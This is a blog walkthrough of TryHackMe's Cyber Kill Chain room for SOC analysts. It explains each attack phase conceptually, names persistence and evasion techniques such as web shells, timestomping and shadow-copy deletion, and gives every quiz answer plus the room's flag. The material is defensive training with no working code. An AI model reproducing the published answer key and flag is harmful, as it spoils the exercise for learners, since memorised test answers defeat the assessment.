TryHackMe: Cyber Kill Chain Walkthrough (SOC Level 1)

Today we will have a look at the Cyber Kill Chain room on TryHackMe. The Cyber Kill Chain framework is designed for identification and prevention of the network intrusions. We will learn what the adversaries need to do in order to achieve their goals. This room is part of the SOC Level 1 Path.

I am making these walkthroughs to keep myself motivated to learn cyber security, and ensure that I remember the knowledge gained by these challenges on HTB and THM. Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.

Room URL: https://tryhackme.com/r/room/cyberkillchainzmt

Task 1: Introduction

This task introduces the room. The Cyber Kill Chain can help us understand and protect against ransomware attacks, security breaches as well as Advanced Persistent Threats (APTs). You can use the Cyber Kill Chain to assess your network and system security by identifying missing security controls and closing certain security gaps based on your company’s infrastructure.

The following attack phases will be covered:

• Reconnaissance
• Weaponization
• Delivery
• Exploitation
• Installation
• Command & Control
• Actions on Objectives

Questions

Nothing else to discuss here, so let’s move on!

Read the above.

Answer: No answer needed

Task 2: Reconnaissance

Reconnaissance

• First phase of an attack: adversaries gather info on infrastructure, employees, and technologies.
• Can be passive (WHOIS lookups, social media scraping) or active (social engineering, port scanning).
• Good recon → targeted, believable attacks.

OSINT

• Publicly available intelligence from search engines, social media, forums, records, WHOIS, etc.
• Used to craft attacks like phishing.

Email Harvesting

Collecting email addresses for phishing campaigns.

OSINT Framework → directory of OSINT tools.

theHarvester → emails, names, subdomains, IPs.

Hunter.io → domain‑linked contacts.

Questions

What is the name of the Intel Gathering Tool that is a web-based interface to the common tools and resources for open-source intelligence?

Of the three tools mentioned in the task that are used for intelligence gathering, OSINT Framework is the tool which is a collection of a ton of OSINT tools.

Answer: OSINT Framework

What is the definition for the email gathering process during the stage of reconnaissance?

We call this email gathering process email harvesting.

Answer: email harvesting

Task 3: Weaponization

That was it for reconnaissance. Let’s move on to the next phase: Weaponization. After enough information is gathered the attacker creates or acquires tools to deliver a malicious payload without directly engaging the victim.

Key terms:

• Malware: a program or software that is designed to damage, disrupt, or gain unauthorized access to a computer.
• Exploit: Code that uses system vulnerabilities.
• Payload: Malicious code executed on the target system.

Examples of Weaponization:

• Embedding malicious macros or VBA scripts into Microsoft Office documents.
• Using USB drives to spread infected payloads.
• Leveraging Command and Control (C2) techniques to execute commands or deliver further payloads remotely.
• Employing backdoors to bypass security and maintain system access.

Questions

What is the term for automated scripts embedded in Microsoft Office documents that can be used to perform tasks or exploited by attackers for malicious purposes?

Well, this is very specific to Microsoft Office documents, but if you have some basic experience with these tools, you probably know the answer: macro.

Answer: Macro

Task 4: Delivery

Delivery is all about deciding the method for transmitting the payload or the malware

Common methods include:

• Phishing Emails: Crafting fake emails to trick victims into opening malicious attachments or links.
• Infected USB Drives: Leaving malware-laden USBs in public areas or mailing them with a company logo to look legitimate, tricking employees into using them.
• Watering Hole Attacks: Compromising a website frequently visited by the target group, redirecting visitors to malicious sites. Victims unknowingly download malware through fake pop-ups or malicious browser extensions, known as drive-by downloads.

These strategies allow attackers to deliver their payloads discreetly, setting the stage for further exploitation.

Questions

What do you call an attack targeting a specific group by infecting their frequently visited website?

As discussed earlier, the type of attack described is called a watering hole attack.

Answer: Watering hole attack

Task 5: Exploitation

Exploitation occurs when an attacker’s code executes on a target by leveraging vulnerabilities.

Techniques used:

• Malicious macros: Often delivered via phishing emails, triggering ransomware when opened.
• Zero-day exploits: Target unknown, unpatched flaws with no early detection.
• Known CVEs: Exploit publicly disclosed but unpatched vulnerabilities.

Post-access actions: Attackers may escalate privileges or move laterally across systems and networks.

Indicators of exploitation:

• Suspicious command-line arguments in logs.
• Unexpected processes starting.
• Registry modifications or creation of new services.

Questions

What is the term for a cyber attack that exploits a software vulnerability that is unknown by software vendors?

Another easy one which we have just covered before. We will a vulnerability which has exist in a piece of software without it being know to the antivirus or software vendors a zero-day vulnerability.

Answer: Zero-day

Task 6: Installation

In the Persistence phase, after gaining access to a system, an attacker probably will install a persistent backdoor to maintain access even if the connection is lost, the system is patched, or the attacker is detected and removed. This ensures continued access in the future.

Persistence can be achieved through several techniques:

• Web Shells: Malicious scripts (e.g., ASP, PHP, JSP) placed on web servers to maintain access. These scripts can be hard to detect due to their file types and simplicity.
• Backdoors on Victim Machines: Tools like Meterpreter (from the Metasploit Framework) allow attackers to maintain an interactive shell and remotely execute malicious code.
• Modifying Windows Services: Attackers can create or alter services to run malicious scripts or payloads regularly. Tools like sc.exe and Reg are used to manipulate service configurations.
• Registry/Startup Folder Persistence: By adding the malicious payload to the Windows Registry or Startup Folder, the attacker ensures it runs each time the victim logs in.

To avoid detection, attackers may use the Timestomping technique, modifying the timestamps of files to make them appear legitimate and evade forensic analysis.

Questions

What technique is used to modify file time attributes to hide new or changes to existing files?

This technique is called Timestomping. This is used to evade forensic analysis.

Answer: Timestomping

What malicious script can be planted by an attacker on the web server to maintain access to the compromised system and enables the web server to be accessed remotely?

A web shell is a malicious script written in web development programming languages such as ASP, PHP, or JSP used by an attacker to maintain access to the compromised system.

Answer: Web shell

Task 7: Command & Control

In the C2 (Command and Control) phase, “Megatron” establishes a communication channel with the victim’s system to remotely control it. This process is known as C2 Beaconing, where the infected machine consistently communicates with the attacker’s C2 server, allowing full control of the compromised system.

Traditional C2 channels like IRC are now largely replaced due to their easy detection by security systems. More common modern C2 channels include:

• HTTP (port 80) and HTTPS (port 443): These protocols blend malicious traffic with legitimate traffic, helping the attacker evade firewalls.
• DNS (Domain Name System): The compromised machine sends frequent DNS requests to a DNS server controlled by the attacker, a method also known as DNS Tunneling.

Important to note that an adversary or another compromised host can be the owner of the C2 infrastructure.

Questions

What is the C2 communication where the victim makes regular DNS requests to a DNS server and domain which belong to an attacker. 

The process where the victim makes regular DNS requests to a DNS server controlled by the attacker is called DNS Tunneling. The DNS server is used to control the compromised host.

Answer: DNS Tunneling

Task 8: Actions on Objectives (Exfiltration)

This phase allows the attacker to fulfill their objectives and ensure maximum disruption or data theft. Examples of this are:

• Collecting credentials from users to gain further access.
• Performing privilege escalation to gain elevated access, such as domain administrator privileges, often by exploiting misconfigurations.
• Internal reconnaissance to interact with internal software and find vulnerabilities.
• Lateral movement to expand control within the company’s network.
• Collecting and exfiltrating sensitive data, which could include intellectual property or personal information.
• Deleting backups and shadow copies (backup snapshots created by Microsoft technologies), which would hinder the company’s ability to recover.
• Overwriting or corrupting data to cause further damage or prevent recovery.

Questions

What technology is included in Microsoft Windows that can create backup copies or snapshots of files or volumes on the computer, even when they are in use? 

Shadow copies are backup snapshots created in Microsoft Windows.

Answer: Shadow Copy

Task 9: Practice Analysis

The infamous Target cyber-attack, which led to one of the largest data breaches in history took place on November 27, 2013.

On December 19th, 2013, Target released a statement confirming the breach, stating that approximately 40 million credit and debit card accounts were impacted between Nov. 27 and Dec. 15, 2013. Target had to pay the fine of $18.5 million under the terms of the multistate settlement agreement. This is considered to be the largest data-breach settlement in history.

Deploy the static site attached to this task and apply your new skills.
The assignment is to add each item on the following list to the correct Kill Chain phase.

Exploit public-facing application (Exploitation Phase)

Exploiting a public-facing application is part of the Exploitation phase ( laptop icon). This does not require more explanation right?

Data from local system (Exfiltration Phase)

Exfiltration of data from the local system is one of the possible goals of the attacker, and therefore part of the Exfiltration phase, represented by the target icon.

Powershell (Weaponization Phase)

This fits into the weaponization phase (the ladybug icon). I suppose it refers to malware that is delivered with a Powershell payload exploiting a vulnerability in the target system.

Dynamic linker hijacking (Installation Phase)

Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. This is a permanent backdoor installed to regain access to the compromised system. This is part of the installation phase, represented by the opened box icon.

Spearphishing attachment (Delivery Phase)

“Spear phishing” is a type of phishing campaign that targets a specific person or group and often will include information known to be of interest to the target, such as current events or financial documents. This is the method of delivery and therefore part of the delivery phase (the box icon).

Fallback channels (Command & Control Phase)

Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control. This is part of the Command & Control phase, represented by the megaphone icon.

Questions

What is the flag after you complete the static site?

To summarize, the correct answers are as follows:

The flag get shown as soon as you submit the answers.

Answer: THM{7HR347_1N73L_12_4w35om3}

Task 10: Conclusion

The Cyber Kill Chain is a valuable tool for improving network defense, but it is not perfect and should not be the only tool relied upon. Here’s why:

• Outdated Framework: The traditional Cyber Kill Chain, developed by Lockheed Martin in 2011, hasn’t seen significant updates. As a result, it can create security gaps, as the threats and tactics used by adversaries have evolved substantially.
• Limited Scope: The traditional Kill Chain was primarily designed to secure the network perimeter and defend against malware threats. However, modern cybersecurity threats have become more complex, with adversaries often combining multiple TTPs (tactics, techniques, and procedures) to achieve their objectives. This makes the original framework less effective against evolving threats.
• Adversaries Evolving: Attackers can bypass traditional defenses by modifying file hashes or IP addresses, rendering some traditional threat detection systems ineffective. To counter this, AI and new algorithms are being developed to detect even the slightest suspicious changes.
• Insider Threats: The traditional Cyber Kill Chain is not well-equipped to handle Insider Threats, which can be difficult to detect as they involve individuals who already have authorized access to an organization’s systems. According to the CISA, insider threats involve using authorized access to harm the organization, and this doesn’t fit into the traditional Kill Chain model.

To create a more robust defense strategy, it is advisable to integrate the traditional Cyber Kill Chain with other models, such as:

• MITRE ATT&CK, which provides a comprehensive mapping of adversary behavior and tactics across all stages of an attack.
• The Unified Kill Chain, which expands upon the traditional framework and is better suited to deal with modern threats, including insider threats.

By combining multiple frameworks, organizations can ensure a more holistic and adaptive approach to cybersecurity.

Questions

Read the above.

Answer: No answer needed

Congratulations on completing Cyber Kill Chain!!!

We are done. Great job!

This was another great room to learn about some of the methodology related to the work of a SOC Analyst. Great job on following along. Happy hacking!

Read the other walkthroughs of the SOC Level 1 Path here.

Find more of my walkthroughs here.

Like my articles?

You are welcome to share my article with a friend or two 🙂
I would be even more grateful if you support me by buying me a cup of coffee:

I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link:

https://referral.hackthebox.com/mzwwXlg